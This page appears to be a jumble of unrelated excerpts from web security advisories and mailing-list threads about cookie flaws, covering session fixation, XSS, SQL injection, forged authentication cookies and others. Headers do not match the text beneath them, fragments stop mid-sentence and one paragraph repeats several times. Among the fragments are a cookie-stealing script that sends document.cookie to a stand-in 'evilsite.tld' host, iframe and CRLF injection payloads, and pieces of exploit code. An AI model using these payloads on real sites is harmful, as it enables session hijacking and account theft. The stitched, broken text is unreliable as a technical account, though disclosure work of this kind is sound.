<< Previous Next >>
cookies
Hash: SHA1
Core Security Technologies - CoreLabs Advisory
http://www.coresecurity.com/corelabs/
Jetty Persistent XSS in Sample Cookies Application
1. *Advisory Information*
There is a flaw in the way OSCommerce handles sessions.
When a client visits a OSCommerce web page, the server sends a cookie. That cookie will be the session cookie for every further requests. Thus, once logged in, the cookie will be used to authenticate the user.
When logging in (without cookies), the URL will look something like http://myserver/myapp/index.php?oscid=sometext
An attacker can send a link crafted like that http://myserver/myapp/index.php?oscid=arbitrarysession. If the admin/user follows the link and logs in, his cookie will still be arbitrarysession. Thus, the attacker can hijack the session because he set the cookie.
P.S. Thanks to the whole TeaM Random (www.etsmtl.ca) for this bug.
Firstname: "><iframe src="//intern0t.net
Lastname: "></iframe> </
- Should work in all browsers as well. (tested in FireFox)
The following is an example of how a cookie stealer will work in conjunction with the exploit:
<script>document.location=%22http://evilsite.tld/cookiestealer.php?cookie=%22 %2B document.cookie;</script>
- The reason why "browser-hex" is used is because the above would else issue an error and thereby not work.
-- Reference about url encoding: http://www.blooberry.com/indexdot/html/topics/urlencoding.htm
CookieLogger:
A SQL injection vulnerability exists in the Plesk application. Please
see the following:
SQL Injection Page 1: "login.php3"
SQL Injection Page 2: "auth.php3"
SQL Injection Cookie Parameter: "PLESKSESSID"
Example: (Will extract the database user)
1) Delay=5224.3877
Curl.exe -k "https://www.???.com:8443/login.php3" --cookie
III - SESSION FIXATION
In a session fixation attack, the attacker have to set
the victim's session id. In our case, the attacker fix
the user's session id, the victim which is logged in,
will get logged out when the cookie will be set, then
if the victim try to log in, the session id will be
registered on the server. Let's see a part of the
logged_in() function:
11| function logged_in ( $redirect_to_login, $redirect_to_setup ) {
===========================================================
3. Proof-of-Concept Exploit
===========================================================
This vulnerability is trivially exploited against any DNN installation using the default ValidationKey and DecryptionKey values. In order to exploit this issue, two forged cookies (named “.DOTNETNUKE” and “portalroles”) must be generated. The “.DOTNETNUKE” cookie is used by the ASP.NET Forms Authentication Provider to identify the authenticated user, while the “portalroles” cookie is used by DNN to store role memberships for the current authenticated user.
The following c# code excerpt, when run from an ASP.NET web form configured to use the default ValidationKey and DecryptionKey values, can be used to generate the two required FormsAuthenticationTicket values required to exploit this issue:
// Step 1: Generate the two FormsAuthenticationTickets
security controls in modern browsers when communication
occurs between two domains that resolve to the same IP
address. This advisory includes a Proof-of-Concept
(PoC) demo and a Java Applet source code, which
demonstrates how this security can be exploited to leak
cookie information to an unauthorised domain, which
resides on the same host IP address.
+------------+
|Exploitation|
+------------+
function "parse_clean_globals()". Let's see the content
of the file "sources/ipsclass.php":
4847| $this->clean_globals( $_GET );
4848| $this->clean_globals( $_POST );
4849| $this->clean_globals( $_COOKIE );
4850| $this->clean_globals( $_REQUEST );
This function will replace special characters such as
the null byte one and "../" (this replacement can be
easily bypassed, we'll see that later), by their
Sample HTTP Request:
GET /cubecart_4/index.php?_a=viewCat&searchStr='&Submit=Go HTTP/1.1
Acunetix-Aspect-Password: 082119f75623eb7abd7bf357698ff66c
Acunetix-Aspect: enabled
Cookie: PHPSESSID=7c970bfe00c50261d25166dbab43c294;
ccUser=7c970bfe00c50261d25166dbab43c294
Host: webapps7:80
Connection: Keep-alive
Accept-Encoding: gzip,deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0; .NET CLR
Pessimism is understandable; I don't fault you for that.
> For multi-node, multi-app, websites sharing auth/state/preferences
> across multiple web assets (physical servers and logical "websites")
> this is pretty much a non-starter. Cookies rule here. For a dozen
> different reasons that I can think of.
Well, I'm sure you read this, but digest auth can do SSO to, arguably
better. Whatever wrappers frameworks put around cookies, which are a
very simple primitive, can be wrapped around digest auth too.
'Seo Panel' Cookie-Rendered Persistent XSS Vulnerability (CVE-2010-4331)
Mark Stanislav - mark.stanislav@gmail.com
I. DESCRIPTION
---------------------------------------
A vulnerability exists in 'Seo Panel' page rendering which allows for unfiltered, unencrypted content to be presented to a user through two different cookies.
II. TESTED VERSION
SektionEins GmbH
www.sektioneins.de
-= Security Advisory =-
Advisory: Piwik Cookie Unserialize() Vulnerability
Release Date: 2009/12/09
Last Modified: 2009/12/09
Author: Stefan Esser [stefan.esser[at]sektioneins.de]
Application: Piwik <= 0.4.5
$port = (int)$tmp[1];
}
}
function _s($url, $cmd, $is_post, $request) {
global $_use_proxy, $proxy_host, $proxy_port, $cookie;
$ch = curl_init();
curl_setopt($ch, CURLOPT_URL, $url);
if ($is_post) {
curl_setopt($ch, CURLOPT_POST, 1);
curl_setopt($ch, CURLOPT_POSTFIELDS, $request."\r\n");
Just my two cents, but...
Many mobile providers are implementing caching on their proxies to make
up for the overpopulated state of their networks, and depending on how
the session ID is generated and stored (being a mobile device this is a
bit more complicated than just setting cookies), it wouldn't necessarily
be a routing problem on the network layer, but could be a routing
problem within the application because of cached resources.
If, for example, facebook set the cookie in a non https session, or in
the url or via a redirect to a uniquely generated page name which in
Vulnerability Fixed: 05/05/2009 7.05 pm
Change Propogated: 05/07/2009 3.19 pm
I recently reported a cross-scripting flaw to Google, which is now fixed. The vulnerability existed in Google’s Support Python Script where a malicious url is not sanitized for XSS character ‘ (single quote) before putting inside javascript variable logURL. As a result, it was possible to break the encapsulation of the var declaration and execute arbitary javascript commands on the main Google.com domain.
The only limitation was the following characters were either filtered out or url encoded - ” (double quote) < > (space) { }. However, this protection could be easily circumvented. I was able to write javascript statements to steal the session cookies [since characters such as ' ; . ( ) / = + were still available] and send it to my evil website. See the example given below.
Your Google.com domain cookie is the central Single Sign-On cookie to all google services. Once anyone gets it, he or she can use it to
1. Steal your emails.
2. Steal your contacts.
Description:
Vanilla is an open-source, standards-compliant, multi-lingual,
fully extensible web based discussion forum. Unfortunately there
are a couple of issues within Vanilla that allow for a malicious
user to steal client based credentials such as cookies. These
issues include both script injection and cross site scripting.
An updated version of Vanilla has been released and users should
upgrade their Vanilla installation as soon as possible.
Administration Console that allows the attacker to gain administrative
access to the server. It is possible to craft such URL that will, when
requested from the server, return a document with arbitrarily chosen HTML
injected. An obvious use for this type of vulnerability is cross-site
scripting that can be used, among other things, for obtaining session
cookies from WebLogic administrators. These cookies, when stolen, provide
the attacker with administrative access to WebLogic Administration
Console, compromising the security of the entire web server.
This vulnerability is exploitable even if the Administration Console is
only being accessed via HTTPS, and even if the Administrative Port is
Administration Console that allows the attacker to gain administrative
access to the server. It is possible to craft such URL that will, when
requested from the server, return a document with arbitrarily chosen HTML
injected. An obvious use for this type of vulnerability is cross- site
scripting that can be used, among other things, for obtaining session
cookies from WebLogic administrators. These cookies, when stolen, provide
the attacker with administrative access to WebLogic Administration
Console, compromising the security of the entire web server.
This vulnerability is exploitable even if the Administration Console is
only being accessed via HTTPS, and even if the Administrative Port is
Authentication Bypass:
There is a serious flaw in the Jamroom authentication mechanism that
allows for an attacker to completely bypass the authentication process
with a specially crafted cookie. The vulnerable code in question can
be found in /includes/jamroom-misc.inc.php @ lines 3667-3681 within
the jrCookie() function
list($user,$hash) = unserialize(stripslashes($_val));
$user = trim(genc('get',$user));
> Vulnerability Fixed: 05/05/2009 7.05 pm
> Change Propogated: 05/07/2009 3.19 pm
>
> I recently reported a cross-scripting flaw to Google, which is now fixed. The vulnerability existed in Google’s Support Python Script where a malicious url is not sanitized for XSS character ‘ (single quote) before putting inside javascript variable logURL. As a result, it was possible to break the encapsulation of the var declaration and execute arbitary javascript commands on the main Google.com domain.
>
> The only limitation was the following characters were either filtered out or url encoded - ” (double quote) < > (space) { }. However, this protection could be easily circumvented. I was able to write javascript statements to steal the session cookies [since characters such as ' ; . ( ) / = + were still available] and send it to my evil website. See the example given below.
>
> Your Google.com domain cookie is the central Single Sign-On cookie to all google services. Once anyone gets it, he or she can use it to
>
> 1. Steal your emails.
> 2. Steal your contacts.
clients and the Trace page in the admin interface can be used to
visualize these log files.
The problem is that they are visualized as HTML and there are no checks
or limitations on their content so a remote attacker can use this bug
for injecting scripts in these files, for example for retrieving the
cookie of the admin and gaining access to the server configuration.
#######################################################################
===========
Where the 'egg.js' script file is:
/-----------
// == XSS - Cookie stealing - vBulletin 3.7.2 PL1 ==
//
// Using the first method described in
// http://www.securityfocus.com/archive/107/308433
//
// To bypass HttpOnly cookie restrictions - Works in IE 6 and lower
* 2.3 branch < 2.3.2.14
-------------------
Vulnerability : Brute force attack
Description :
The IPDiva Mediation server suffer of cookie exploitation
vulnerability. A mecanism of limitation after a number of bad login/
passwd exist based on a cookie. When the cookie is null, the account
is blocked. With the modification of the cookie to a value like 4242,
we can try a unlimited number of connection if the cookie is resetted
when it reached 2
Microsoft Windows Internet Explorer 8.0 Beta 2 was designed to stop "Type 1
XSS" attacks. CRLF Injection is also XSS type 1 and is not mitigated by the
filter, though the data in the query string will still be filtered.
This means that if an attacker tries to exploit a CRLF for XSS in the
casual manner, used in this demo:
http://www.linkstofiles.com/crlf.py?url=cookie1%3dvalue1;%0D%0A%0D%0A<html><body>
<script>alert('get it?')</script></body></html>
His attack will fail as "<script>" will be filtered to "<sc#ipt>"
However, an attacker can inject a content-type header and overwrite the
CMS VULNERABILITY:
-->TESTED ON: firefox 3
-->DORK: "Basado en Spirate"
-->CATEGORY: SQL INJECTION VULNERABILITIES / COOKIE STEALING / BLIND SQL INJECTION
-->AFFECT VERSION: <= 2.1
-->Discovered Bug date: 2009-05-10
-->Reported Bug date: 2009-05-10
-->Fixed bug date: N/A
-->Info patch: Not fixed
http://websecuritytool.codeplex.com/. A screenshot of the reporting screen
is also there.
This tool provides pen-testers hot-spot detection for vulnerabilities,
developers quick sanity checks, and auditors PCI compliance auditing. It
looks for issues related to mashups, user-controlled payloads, cookies,
comments, HTTP headers, SSL, Flash, Silverlight, referrer leaks, information
disclosure, Unicode, and more.
Major Features:
1. Silent and passive detection of security, privacy, and PCI compliance
Administration Console that allows the attacker to gain administrative
access to the server. It is possible to craft such URL that will, when
requested from the server, return a document with arbitrarily chosen HTML
injected. An obvious use for this type of vulnerability is cross- site
scripting that can be used, among other things, for obtaining session
cookies from WebLogic administrators. These cookies, when stolen, provide
the attacker with administrative access to WebLogic Administration
Console, compromising the security of the entire web server.
This vulnerability is exploitable even if the Administration Console is
only being accessed via HTTPS, and even if the Administrative Port is
ManageEngine, the Enterprise IT Management Software division of Zoho
Corporation [1].
The authentication process of ServiceDesk Plus obfuscates user passwords
using a trivial and symmetrical algorithm in Javascript code with no
secret. Given that user passwords are locally stored in user cookies and
having the Javascript code to encrypt and decrypt passwords in a .js
file , the authentication process of ServiceDesk Plus can be bypassed
allowing an attacker to get usernames+passwords of registered users.
Additionally, a cross site scripting vulnerability related to search
-------------------------
Affected URL: Multiple, but the main index is as follows: (dates need to be adjusted to be valid)
https://192.168.1.67:9443/explorer_wse/favorites.exe?startDate=2011-10-22&endDate=2011-10-23&action=def
It is possible to gain access to the report section without authentication, by adding a cookie with predefined values.
(This can be done with Cookie-Manager, or various other IE/Firefox plugins which can be used to edit browser cookies)
This gives full access to the report section of the user interface (but not the policy-management section).
The Websense reports contain confidential information such as user data, browsing history, system information, and blocked threats.
option in web app development.
> As more and more app development moves to hardware platforms
> (iAppleStuffs) and social media aka Ad-metadata networks (Facebook,
> Google *.google.com apps, webmail, etc.) cookies are an easy and
> transparent way to fly, that work now, all the time, and have clear
> business drivers behind them for auth tracking (and working now, all
> the time).
>
> Many modern web 2.0 products use cookies for auth = tracking, not auth
<<Previous Next>>
|
